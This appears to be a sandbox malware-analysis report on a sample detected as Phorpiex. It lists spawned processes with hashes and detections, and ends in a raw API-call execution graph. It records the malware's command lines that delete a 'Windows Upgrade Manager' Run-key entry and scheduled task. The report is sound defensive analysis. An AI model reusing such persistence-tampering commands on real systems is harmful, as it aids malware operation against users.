                                                                                                                                                        Path:C:\Windows\sysppvrdnvs.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:"C:\Windows\sysppvrdnvs.exe"
                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                        File size:85'504 bytes
                                                                                                                                                        MD5 hash:06560B5E92D704395BC6DAE58BC7E794
                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Yara matches:
                                                                                                                                                        • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000011.00000002.2413964057.0000000000410000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000011.00000000.2392940461.0000000000410000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                                                                        Has exited:true

                                                                                                                                                        Target ID:18
                                                                                                                                                        Start time:01:26:43
                                                                                                                                                        Start date:26/10/2024
                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\2355412914.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\2355412914.exe
                                                                                                                                                        Imagebase:0x430000
                                                                                                                                                        File size:8'704 bytes
                                                                                                                                                        MD5 hash:CB8420E681F68DB1BAD5ED24E7B22114
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Antivirus matches:
                                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                                        • Detection: 75%, ReversingLabs
                                                                                                                                                        Has exited:true

                                                                                                                                                        Target ID:19
                                                                                                                                                        Start time:01:26:43
                                                                                                                                                        Start date:26/10/2024
                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
                                                                                                                                                        Imagebase:0x7ff6ff0f0000
                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        Target ID:20
                                                                                                                                                        Start time:01:26:43
                                                                                                                                                        Start date:26/10/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6d64d0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:21
Start time:01:26:43
Start date:26/10/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
Imagebase:0x7ff6ff0f0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:22
Start time:01:26:43
Start date:26/10/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6d64d0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:23
Start time:01:26:43
Start date:26/10/2024
Path:C:\Windows\System32\reg.exe
Wow64 process (32bit):false
Commandline:reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
Imagebase:0x7ff7e3290000
File size:77'312 bytes
MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:24
Start time:01:26:43
Start date:26/10/2024
Path:C:\Windows\System32\schtasks.exe
Wow64 process (32bit):false
Commandline:schtasks /delete /f /tn "Windows Upgrade Manager"
Imagebase:0x7ff62f0e0000
File size:235'008 bytes
MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:26
Start time:01:26:46
Start date:26/10/2024
Path:C:\Users\user\AppData\Local\Temp\2658326577.exe
Wow64 process (32bit):true
Commandline:C:\Users\user\AppData\Local\Temp\2658326577.exe
Imagebase:0x400000
File size:85'504 bytes
MD5 hash:06560B5E92D704395BC6DAE58BC7E794
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 0000001A.00000002.2514348766.0000000000410000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
• Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 0000001A.00000000.2493732494.0000000000410000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
• Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: C:\Users\user\AppData\Local\Temp\2658326577.exe, Author: Joe Security
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
• Detection: 82%, ReversingLabs
Has exited:true

Execution Graph

Execution Coverage:2.9%
Dynamic/Decrypted Code Coverage:0%
Signature Coverage:11.9%
Total number of Nodes:1127
Total number of Limit Nodes:30
CompareStringW 53075->53077 53075->53103 53076 40613d 60 API calls 53076->53103 53078 423926 CompareStringW 53077->53078 53079 423888 lstrlenW 53077->53079 53080 423a24 lstrlenW lstrlenW CompareStringW 53078->53080 53078->53103 53079->53103 53081 423a54 lstrlenW 53080->53081 53082 423aba CompareStringW 53080->53082 53081->53103 53083 423b48 CompareStringW 53082->53083 53082->53103 53085 423b8b CompareStringW 53083->53085 53083->53103 53084 407535 6 API calls 53084->53103 53086 423bac CompareStringW 53085->53086 53085->53103 53087 423bcf CompareStringW 53086->53087 53086->53103 53089 423bf2 CompareStringW 53087->53089 53087->53103 53088 421943 52 API calls 53088->53103 53090 423c15 CompareStringW 53089->53090 53089->53103 53092 423c38 CompareStringW 53090->53092 53090->53103 53091 409885 72 API calls 53091->53103 53093 423c5e CompareStringW 53092->53093 53092->53103 53094 423c84 CompareStringW 53093->53094 53093->53103 53095 423cb2 CompareStringW 53094->53095 53094->53103 53096 423d1c lstrlenW lstrlenW CompareStringW 53095->53096 53095->53103 53097 423dc1 lstrlenW lstrlenW CompareStringW 53096->53097 53098 423d4c lstrlenW 53096->53098 53099 423df1 lstrlenW 53097->53099 53100 423e69 lstrlenW lstrlenW CompareStringW 53097->53100 53098->53103 53099->53103 53101 423f04 lstrlenW lstrlenW CompareStringW 53100->53101 53102 423e99 lstrlenW 53100->53102 53105 423fc3 lstrlenW lstrlenW CompareStringW 53101->53105 53106 423f38 lstrlenW 53101->53106 53102->53103 53103->53049 53103->53051 53103->53053 53103->53076 53103->53084 53103->53085 53103->53088 53103->53091 53103->53095 53103->53097 53103->53100 53104 403958 52 API calls 53103->53104 53109 42411b lstrlenW lstrlenW CompareStringW 53103->53109 53104->53103 53107 423ff3 lstrlenW 53105->53107 53108 42406c lstrlenW lstrlenW CompareStringW 53105->53108 53111 423f58 53106->53111 53107->53111 53108->53109 53110 42409c lstrlenW 53108->53110 53109->53103 53110->53103 53111->53105 53111->53108 53113 40f2c6 _memcpy_s 53112->53113 
53114 40f344 SetFilePointerEx 53113->53114 53115 40f304 GetLastError 53113->53115 53117 40f3a0 ReadFile 53114->53117 53118 40f360 GetLastError 53114->53118 53141 40f310 53115->53141 53119 40f3fa 53117->53119 53120 40f3ba GetLastError 53117->53120 53118->53141 53121 40f416 SetFilePointerEx 53119->53121 53119->53141 53120->53141 53122 40f46a ReadFile 53121->53122 53123 40f42a GetLastError 53121->53123 53124 40f4c7 53122->53124 53125 40f487 GetLastError 53122->53125 53123->53141 53126 40f4e4 SetFilePointerEx 53124->53126 53124->53141 53125->53141 53129 40f54b ReadFile 53126->53129 53130 40f50b GetLastError 53126->53130 53127 451586 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 53128 40834b 53127->53128 53128->52875 53157 41e4e2 53128->53157 53131 40f5a8 ReadFile 53129->53131 53132 40f568 GetLastError 53129->53132 53130->53141 53133 40f605 SetFilePointerEx 53131->53133 53134 40f5c5 GetLastError 53131->53134 53132->53141 53135 40f664 ReadFile 53133->53135 53136 40f624 GetLastError 53133->53136 53134->53141 53137 40f6e8 GetLastError 53135->53137 53138 40f688 53135->53138 53136->53141 53137->53141 53139 40f73a 53138->53139 53140 40f6c2 ReadFile 53138->53140 53138->53141 53153 40f7de 53138->53153 53139->53141 53185 4073cd GetProcessHeap HeapAlloc 53139->53185 53140->53137 53140->53138 53141->53127 53143 40f780 53143->53141 53144 40f7bb SetFilePointerEx 53143->53144 53145 40f7d2 GetLastError 53144->53145 53146 40f81b ReadFile 53144->53146 53145->53153 53147 40f840 GetLastError 53146->53147 53149 40f877 53146->53149 53148 40f84c 53147->53148 53148->53153 53149->53148 53186 405811 GetFileSizeEx GetLastError 53149->53186 53152 40f92e 53187 4073cd GetProcessHeap HeapAlloc 53152->53187 53153->53141 53189 40758b GetProcessHeap HeapFree GetLastError 53153->53189 53155 40f9d6 _memcpy_s 53188 40ef76 GetModuleHandleW GetLastError 53155->53188 53190 46d627 53157->53190 53162 405cbf 52 API calls 53164 41e568 53162->53164 53163 41e71c 53163->52875 53167 41e501 53164->53167 
53203 470b7d 53164->53203 53167->53163 53245 404128 GetProcessHeap HeapFree GetLastError 53167->53245 53168 41e607 53242 403958 53168->53242 53169 41e59f 53169->53167 53169->53168 53172 41e5ec 53169->53172 53173 41e5cc 53169->53173 53171 41e5d2 53171->53167 53215 46ce76 53171->53215 53172->53168 53241 465caa 72 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 53172->53241 53175 405cbf 52 API calls 53173->53175 53175->53171 53178 46d627 72 API calls 53179 41e67a 53178->53179 53179->53167 53180 405d77 52 API calls 53179->53180 53181 41e6aa 53180->53181 53181->53167 53182 405cbf 52 API calls 53181->53182 53183 41e6cf 53182->53183 53183->53167 53228 41baa8 53183->53228 53185->53143 53186->53152 53187->53155 53188->53148 53189->53141 53191 46d65f 53190->53191 53199 46d808 53190->53199 53191->53199 53246 46d997 53191->53246 53193 46d84c 53196 451586 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 53193->53196 53198 41e4fb 53196->53198 53198->53167 53200 405d77 53198->53200 53199->53193 53260 404128 GetProcessHeap HeapFree GetLastError 53199->53260 53261 405d90 53200->53261 53202 405d8c 53202->53162 53202->53167 53275 4709fc 53203->53275 53206 470bc2 53208 470c4c 53206->53208 53209 470c3b 53206->53209 53212 470c47 53206->53212 53210 403958 52 API calls 53208->53210 53209->53212 53285 404128 GetProcessHeap HeapFree GetLastError 53209->53285 53210->53212 53211 470c24 RegCloseKey 53211->53206 53212->53169 53214 470b9f 53214->53206 53214->53211 53216 46ce8f 53215->53216 53222 46ceae 53215->53222 53216->53222 53294 46cc59 73 API calls 53216->53294 53218 46cea8 53218->53222 53295 46cc59 73 API calls 53218->53295 53220 46ced3 53221 46cee9 CompareStringW 53220->53221 53220->53222 53221->53222 53223 46cf00 GetLastError 53221->53223 53224 46cf7f 53222->53224 53296 404128 GetProcessHeap HeapFree GetLastError 53222->53296 53223->53222 53226 41e63a 53224->53226 53297 404128 GetProcessHeap HeapFree GetLastError 53224->53297 53226->53167 53226->53178 53298 406d9a 53228->53298 
53230 41babc 53231 405cbf 52 API calls 53230->53231 53240 41bac2 53230->53240 53232 41baef 53231->53232 53232->53240 53312 41b8d2 53232->53312 53235 41bbb6 53235->53167 53240->53235 53336 404128 GetProcessHeap HeapFree GetLastError 53240->53336 53241->53168 53450 402a17 53242->53450 53244 40396b 53244->53171 53245->53163 53247 4018a4 68 API calls 53246->53247 53248 46d9b4 53247->53248 53249 46d9ed GetProcAddress 53248->53249 53257 46d9be 53248->53257 53254 46da33 53249->53254 53249->53257 53250 46dac4 53252 46d7f7 53250->53252 53253 46daca FreeLibrary 53250->53253 53251 46dabb CoTaskMemFree 53251->53250 53252->53193 53252->53199 53259 46d47d 53 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 53252->53259 53253->53252 53255 403958 52 API calls 53254->53255 53254->53257 53256 46da71 53255->53256 53256->53257 53258 405cbf 52 API calls 53256->53258 53257->53250 53257->53251 53258->53257 53259->53199 53260->53193 53262 405da0 53261->53262 53263 405e4c 53261->53263 53262->53263 53267 405dab 53262->53267 53264 403958 52 API calls 53263->53264 53268 405dd3 53264->53268 53265 405e29 53266 403958 52 API calls 53265->53266 53266->53268 53267->53265 53269 405dc1 53267->53269 53268->53202 53270 403958 52 API calls 53269->53270 53271 405dcd 53270->53271 53271->53268 53272 405cbf 52 API calls 53271->53272 53273 405def 53272->53273 53273->53268 53274 403485 52 API calls 53273->53274 53274->53268 53276 405d77 52 API calls 53275->53276 53277 470a16 53276->53277 53278 470a1c 53277->53278 53286 467b58 53277->53286 53280 470ab4 53278->53280 53289 404128 GetProcessHeap HeapFree GetLastError 53278->53289 53280->53206 53280->53214 53284 467d44 58 API calls 53280->53284 53283 470a9a RegCloseKey 53283->53278 53284->53214 53285->53212 53290 467b72 53286->53290 53288 467b6e 53288->53278 53288->53283 53289->53280 53291 467b84 53290->53291 53292 467b9d RegOpenKeyExW 53291->53292 53293 467ba4 53292->53293 53293->53288 53294->53218 53295->53220 53296->53224 53297->53226 53299 406db4 
53298->53299 53300 406e08 53298->53300 53301 40429c 2 API calls 53299->53301 53337 403471 52 API calls 53300->53337 53303 406dbe 53301->53303 53304 4018a4 68 API calls 53303->53304 53307 406dc4 53303->53307 53305 406df1 53304->53305 53306 406e2e GetProcAddress 53305->53306 53305->53307 53308 406e45 53306->53308 53307->53230 53309 406ece GetLastError 53308->53309 53311 406e89 53308->53311 53338 403471 52 API calls 53308->53338 53309->53311 53311->53307 53339 407406 53312->53339 53314 41b8f7 53315 41b8fd 53314->53315 53316 41b939 53314->53316 53389 40613d 60 API calls 53314->53389 53324 41ba92 53315->53324 53399 404128 GetProcessHeap HeapFree GetLastError 53315->53399 53316->53315 53329 41b9d4 53316->53329 53348 470c62 53316->53348 53319 41ba17 53360 470771 53319->53360 53320 41ba3b 53321 403958 52 API calls 53320->53321 53321->53315 53323 41baa0 53323->53240 53330 470106 UuidCreate 53323->53330 53324->53323 53400 404128 GetProcessHeap HeapFree GetLastError 53324->53400 53329->53315 53329->53319 53329->53320 53331 470149 StringFromGUID2 53330->53331 53332 470136 53330->53332 53331->53332 53333 451586 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 53332->53333 53334 41bb4a 53333->53334 53334->53240 53335 46d0d4 73 API calls 53334->53335 53335->53240 53336->53235 53337->53303 53338->53308 53340 407425 53339->53340 53341 4074ea 53340->53341 53342 40747d 53340->53342 53347 40742b 53340->53347 53403 4073cd GetProcessHeap HeapAlloc 53341->53403 53401 4078fc GetProcessHeap HeapSize 53342->53401 53345 40748c 53345->53347 53402 407684 GetProcessHeap HeapReAlloc 53345->53402 53347->53314 53349 4709fc 54 API calls 53348->53349 53350 470c7b 53349->53350 53351 470c84 53350->53351 53357 470ca7 53350->53357 53404 467faa 53350->53404 53356 470d0f RegCloseKey 53351->53356 53351->53357 53353 470d37 53355 403958 52 API calls 53353->53355 53354 470d26 53358 41b99c 53354->53358 53410 404128 GetProcessHeap HeapFree GetLastError 53354->53410 53355->53358 53356->53357 53357->53353 
53357->53354 53357->53358 53358->53315 53358->53329 53390 470388 53358->53390 53361 4018a4 68 API calls 53360->53361 53362 470796 53361->53362 53363 4707ba GetProcAddress 53362->53363 53385 47079c 53362->53385 53364 4707d8 GetCurrentProcess 53363->53364 53381 470838 53363->53381 53439 466e6b 13 API calls 53364->53439 53365 467b58 RegOpenKeyExW 53372 470877 53365->53372 53367 4707e8 53367->53381 53367->53385 53440 46d2f8 77 API calls 53367->53440 53368 4709e7 53370 4709f5 53368->53370 53446 404128 GetProcessHeap HeapFree GetLastError 53368->53446 53369 4709da RegCloseKey 53369->53368 53370->53315 53374 47094d 53372->53374 53372->53385 53427 470680 53372->53427 53374->53385 53444 46d2f8 77 API calls 53374->53444 53375 470813 53375->53385 53441 407535 6 API calls 53375->53441 53380 47097f 53380->53385 53445 407535 6 API calls 53380->53445 53381->53365 53381->53385 53382 4708ee 53382->53385 53386 470680 59 API calls 53382->53386 53385->53368 53385->53369 53387 470926 53386->53387 53387->53374 53387->53385 53443 407535 6 API calls 53387->53443 53389->53316 53391 4703d3 53390->53391 53392 47039c 53390->53392 53448 403471 52 API calls 53391->53448 53394 40429c 2 API calls 53392->53394 53396 4703a7 53394->53396 53395 47040a GetLastError 53395->53396 53396->53395 53398 4703ad 53396->53398 53449 403471 52 API calls 53396->53449 53398->53329 53399->53324 53400->53323 53401->53345 53402->53347 53403->53347 53405 467fd0 53404->53405 53406 467fc1 53404->53406 53409 467fd6 53405->53409 53411 46807b 53405->53411 53406->53405 53426 4078fc GetProcessHeap HeapSize 53406->53426 53409->53351 53410->53358 53412 467237 RegQueryValueExW 53411->53412 53417 4680a5 53412->53417 53413 468202 53413->53409 53414 404128 GetProcessHeap HeapFree GetLastError 53414->53413 53415 4073cd GetProcessHeap HeapAlloc 53415->53417 53416 407684 GetProcessHeap HeapReAlloc 53416->53417 53417->53415 53417->53416 53418 468189 53417->53418 53421 467237 RegQueryValueExW 53417->53421 53423 4680c0 53417->53423 53419 
4079cb 56 API calls 53418->53419 53418->53423 53420 4681a9 53419->53420 53422 4681ce lstrlenW 53420->53422 53420->53423 53421->53417 53422->53413 53424 4681ee 53422->53424 53423->53413 53423->53414 53425 40758b GetProcessHeap HeapFree GetLastError 53424->53425 53425->53423 53426->53405 53428 467faa 58 API calls 53427->53428 53429 4706a2 53428->53429 53430 47070d 53429->53430 53431 4706e8 53429->53431 53432 4706c5 53429->53432 53435 403958 52 API calls 53430->53435 53434 470388 53 API calls 53431->53434 53433 470769 53432->53433 53447 404128 GetProcessHeap HeapFree GetLastError 53432->53447 53433->53382 53433->53385 53442 407535 6 API calls 53433->53442 53437 4706f3 53434->53437 53435->53437 53437->53432 53438 405cbf 52 API calls 53437->53438 53438->53432 53439->53367 53440->53375 53441->53381 53442->53382 53443->53374 53444->53380 53445->53385 53446->53370 53447->53433 53448->53396 53449->53396 53451 402a2a 53450->53451 53453 402a35 53450->53453 53452 40429c 2 API calls 53451->53452 53452->53453 53455 402a3b 53453->53455 53456 40294d 52 API calls 53453->53456 53455->53244 53456->53455 53458 4058b1 53457->53458 53459 4058b7 GetLastError 53458->53459 53460 4058ff GlobalAlloc 53458->53460 53462 4058c3 53459->53462 53461 405937 53460->53461 53465 4058d0 53460->53465 53463 405946 GetLastError 53461->53463 53464 405952 53461->53464 53462->53460 53462->53465 53463->53464 53466 4059a4 GetLastError 53464->53466 53468 40595f 53464->53468 53465->52913 53466->53468 53467 4059f3 GlobalFree 53467->53465 53468->53467 53469->52919 53471 46603e 53470->53471 53472 4094f2 53471->53472 53474 4656fb 72 API calls 53471->53474 53472->52719 53472->53016 53474->53472 53476 40cb74 53475->53476 53478 40cbaf 53476->53478 53480 40cbcf 53476->53480 53508 4098a6 53476->53508 53478->53480 53513 409984 54 API calls 53478->53513 53481 451586 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 53480->53481 53482 40cc1a 53481->53482 53482->52984 53483 4104aa 53482->53483 53484 4104ca _memcpy_s 
53483->53484 53485 406418 60 API calls 53484->53485 53487 4104ff 53484->53487 53486 41051d 53485->53486 53486->53487 53520 41030a 53486->53520 53489 41057d 53487->53489 53532 404128 GetProcessHeap HeapFree GetLastError 53487->53532 53489->52984 53491 4102e9 8 API calls 53489->53491 53491->52960 53492->52964 53493->52972 53494->52974 53495->52984 53496->52981 53497->52983 53498->52987 53499->52986 53500->52988 53501->52991 53502->52994 53503->52996 53504->52963 53505->52965 53506->52967 53507->52970 53514 409a72 53508->53514 53510 4098c0 53511 4098c6 53510->53511 53519 40b67a 52 API calls _memcpy_s 53510->53519 53511->53476 53513->53478 53515 409a8c CompareStringW 53514->53515 53518 409ae9 53514->53518 53516 409ab9 53515->53516 53516->53515 53517 409add GetLastError 53516->53517 53516->53518 53517->53518 53518->53510 53519->53511 53521 41033c CreateFileW 53520->53521 53522 4103af GetCurrentProcess GetCurrentProcess DuplicateHandle 53520->53522 53523 410360 GetLastError 53521->53523 53524 410409 SetFilePointerEx 53521->53524 53522->53524 53525 4103cf GetLastError 53522->53525 53529 41036c 53523->53529 53528 41042a GetLastError 53524->53528 53530 41046b 53524->53530 53526 410398 53525->53526 53526->53487 53528->53526 53529->53526 53530->53526 53533 43a11b 53530->53533 53532->53489 53534 403958 52 API calls 53533->53534 53535 43a137 53534->53535 53536 43a154 CreateEventW 53535->53536 53537 43a13d 53535->53537 53538 43a166 GetLastError 53536->53538 53539 43a1aa CreateEventW 53536->53539 53537->53526 53538->53537 53540 43a1f3 CreateThread 53539->53540 53541 43a1bc GetLastError 53539->53541 53542 43a244 53540->53542 53543 43a20a GetLastError 53540->53543 53558 439a90 CoInitializeEx 53540->53558 53541->53537 53545 439eb4 53542->53545 53543->53537 53554 4016ca WaitForMultipleObjects 53545->53554 53547 439ee2 53548 439ee9 53547->53548 53549 439f14 53547->53549 53550 439f6c ResetEvent 53547->53550 53548->53537 53549->53548 53552 439f1d GetExitCodeThread 53549->53552 
53550->53548 53551 439f79 GetLastError 53550->53551 53551->53548 53552->53548 53553 439f32 GetLastError 53552->53553 53553->53548 53555 4016f8 53554->53555 53557 4016ee 53554->53557 53556 40175c GetLastError 53555->53556 53555->53557 53556->53557 53557->53547 53559 439ac1 53558->53559 53571 439ae5 53558->53571 53560 451586 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 53559->53560 53561 439d72 53560->53561 53562 439c5a SetEvent 53563 439cb0 53562->53563 53564 439c67 GetLastError 53562->53564 53572 4017b5 WaitForSingleObject GetLastError 53563->53572 53568 439b35 53564->53568 53566 439d5d CoUninitialize 53566->53559 53567 439cba 53567->53568 53569 439cd9 ResetEvent 53567->53569 53568->53566 53569->53568 53570 439ce6 GetLastError 53569->53570 53570->53568 53571->53562 53571->53568 53572->53567 53574 4660f1 53573->53574 53575 4660b8 53573->53575 53577 405d77 52 API calls 53574->53577 53575->53574 53576 4660bd 53575->53576 53607 405e84 53576->53607 53582 466100 53577->53582 53579 4660d6 53580 46624e 53579->53580 53581 466249 53579->53581 53602 4660e0 53579->53602 53586 4663a6 10 API calls 53580->53586 53598 46626c 53580->53598 53657 465ec5 90 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 53581->53657 53584 466132 53582->53584 53582->53602 53641 40613d 60 API calls 53582->53641 53584->53602 53642 4065c3 53584->53642 53585 4662a8 LeaveCriticalSection 53590 4662c1 53585->53590 53591 4662b9 53585->53591 53592 46625d 53586->53592 53588 403958 52 API calls 53588->53602 53595 419e72 53590->53595 53660 404128 GetProcessHeap HeapFree GetLastError 53590->53660 53659 404128 GetProcessHeap HeapFree GetLastError 53591->53659 53592->53598 53658 404128 GetProcessHeap HeapFree GetLastError 53592->53658 53593 466165 53593->53602 53646 40241c CreateDirectoryW 53593->53646 53595->53004 53595->53007 53598->53585 53598->53588 53600 466188 53601 4661b2 CreateFileW 53600->53601 53600->53602 53603 4661e8 GetLastError 53601->53603 53605 4661f4 53601->53605 53602->53585 
53603->53605 53604 466233 SetFilePointer 53604->53579 53605->53579 53605->53604 53606 466201 53605->53606 53606->53602 53608 405ed6 53607->53608 53609 405f0f 53607->53609 53608->53609 53610 405edb 53608->53610 53611 406d9a 70 API calls 53609->53611 53612 405d90 52 API calls 53610->53612 53613 405f19 53611->53613 53614 405ee8 53612->53614 53615 405d90 52 API calls 53613->53615 53624 405eee 53613->53624 53616 4065c3 52 API calls 53614->53616 53614->53624 53615->53614 53617 405f64 53616->53617 53618 40241c 5 API calls 53617->53618 53634 405f71 53617->53634 53618->53634 53619 406100 53622 40610e 53619->53622 53662 404128 GetProcessHeap HeapFree GetLastError 53619->53662 53620 405fad GetLocalTime 53620->53634 53623 40611c 53622->53623 53663 404128 GetProcessHeap HeapFree GetLastError 53622->53663 53627 40612a 53623->53627 53664 404128 GetProcessHeap HeapFree GetLastError 53623->53664 53624->53619 53661 404128 GetProcessHeap HeapFree GetLastError 53624->53661 53630 451586 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 53627->53630 53628 403578 56 API calls 53628->53634 53632 406139 53630->53632 53631 406011 CreateFileW 53633 406033 GetLastError 53631->53633 53640 40607c 53631->53640 53632->53579 53633->53634 53635 406045 Sleep 53633->53635 53634->53620 53634->53624 53634->53628 53634->53631 53634->53635 53636 4060a5 53634->53636 53634->53640 53635->53634 53637 406055 53635->53637 53636->53624 53639 4060eb CloseHandle 53636->53639 53637->53634 53638 403958 52 API calls 53638->53636 53639->53624 53640->53636 53640->53638 53641->53584 53643 4065d6 53642->53643 53645 406615 53642->53645 53644 403958 52 API calls 53643->53644 53643->53645 53644->53645 53645->53593 53647 402438 GetLastError 53646->53647 53654 402445 53646->53654 53648 40244c 53647->53648 53647->53654 53649 40252b GetFileAttributesW 53648->53649 53650 402459 53648->53650 53649->53650 53651 40241c GetFileAttributesW 53650->53651 53650->53654 53652 40249c 53651->53652 53653 4024c4 CreateDirectoryW 
53652->53653 53652->53654 53655 4024d2 GetLastError 53653->53655 53656 4024e2 53653->53656 53654->53600 53655->53656 53656->53654 53657->53580 53658->53598 53659->53590 53660->53595 53661->53619 53662->53622 53663->53623 53664->53627 53668 465a96 53667->53668 53669 465ad2 53668->53669 53673 465aff 53668->53673 53674 465a9c 53668->53674 53675 403bee 6 API calls 53669->53675 53671 465b04 WriteFile 53672 465b1f GetLastError 53671->53672 53671->53673 53672->53673 53673->53671 53673->53674 53674->53031 53675->53674 53676->52755 53678 459a1c 53677->53678 53679 459a0a 53677->53679 53689 45988d 53678->53689 53704 451eea GetModuleHandleW 53679->53704 53683 4517e5 53683->52583 53684 459a0f 53684->53678 53705 459abe GetModuleHandleExW 53684->53705 53687 459a6e 53690 459899 __FrameHandler3::FrameUnwindToState 53689->53690 53711 45cf31 EnterCriticalSection 53690->53711 53692 4598a3 53712 4598f5 53692->53712 53694 4598b0 53716 4598ce 53694->53716 53697 459a74 53721 459aa5 53697->53721 53699 459a7e 53700 459a92 53699->53700 53701 459a82 GetCurrentProcess TerminateProcess 53699->53701 53702 459abe CallUnexpected 3 API calls 53700->53702 53701->53700 53703 459a9a ExitProcess 53702->53703 53704->53684 53706 459afd GetProcAddress 53705->53706 53707 459b1e 53705->53707 53706->53707 53708 459b11 53706->53708 53709 459b24 FreeLibrary 53707->53709 53710 459a1b 53707->53710 53708->53707 53709->53710 53710->53678 53711->53692 53714 459901 __FrameHandler3::FrameUnwindToState CallUnexpected 53712->53714 53713 459965 CallUnexpected 53713->53694 53714->53713 53719 459fed 14 API calls 2 library calls 53714->53719 53720 45cf81 LeaveCriticalSection 53716->53720 53718 4598bc 53718->53683 53718->53697 53719->53713 53720->53718 53724 45cfbd 5 API calls CallUnexpected 53721->53724 53723 459aaa CallUnexpected 53723->53699 53724->53723 53748 40a810 57 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 53822 40af10 67 API calls 52465 439110 CompareStringA 52466 43914f GetCurrentProcess 
GetCurrentProcess DuplicateHandle 52465->52466 52467 4391fc CreateFileA 52465->52467 52468 439170 GetLastError 52466->52468 52469 4391bf 52466->52469 52470 43921c GetLastError 52467->52470 52472 43917c 52467->52472 52468->52472 52474 438f71 6 API calls 52469->52474 52473 439228 52470->52473 52473->52472 52474->52472 53751 43ba10 89 API calls 53824 45bd10 15 API calls 53753 40ac20 GetProcessHeap HeapFree GetLastError GetProcessHeap HeapSize 53754 40ae20 15 API calls 53826 454f24 41 API calls 4 library calls 53756 424c20 58 API calls 53828 40a530 6 API calls 53830 439330 SetFilePointerEx GetLastError 53762 4390c0 32 API calls 53763 448ec0 63 API calls 53835 45b3c0 15 API calls 2 library calls 53836 4555c3 54 API calls 3 library calls 53765 40b0d0 53 API calls 53766 40aad0 54 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 53838 40a5d0 87 API calls 53841 454fd1 52 API calls 4 library calls 53842 45ddd0 FreeLibrary 53768 466ed0 WaitForSingleObject GetLastError GetExitCodeProcess GetLastError 53769 4620df 20 API calls __vsnwprintf_l 53770 4084e0 10 API calls 53771 40a4e0 6 API calls 52447 4766e6 52448 4766f0 52447->52448 52449 407e32 ___delayLoadHelper2@8 16 API calls 52448->52449 52450 4766fd 52449->52450 53772 43a6e0 CompareStringW CompareStringOrdinal GetLastError 53847 40a9f0 52 API calls 53848 40aff0 67 API calls 53774 45cef0 7 API calls 52391 407b80 52392 407b5f 52391->52392 52392->52391 52394 407e32 52392->52394 52420 407b90 52394->52420 52397 407e9f 52398 407dd0 DloadReleaseSectionWriteAccess 8 API calls 52397->52398 52399 407eaa RaiseException 52398->52399 52400 408098 52399->52400 52400->52392 52401 407f3b LoadLibraryExA 52402 407f9c 52401->52402 52403 407f4e GetLastError 52401->52403 52407 407fae 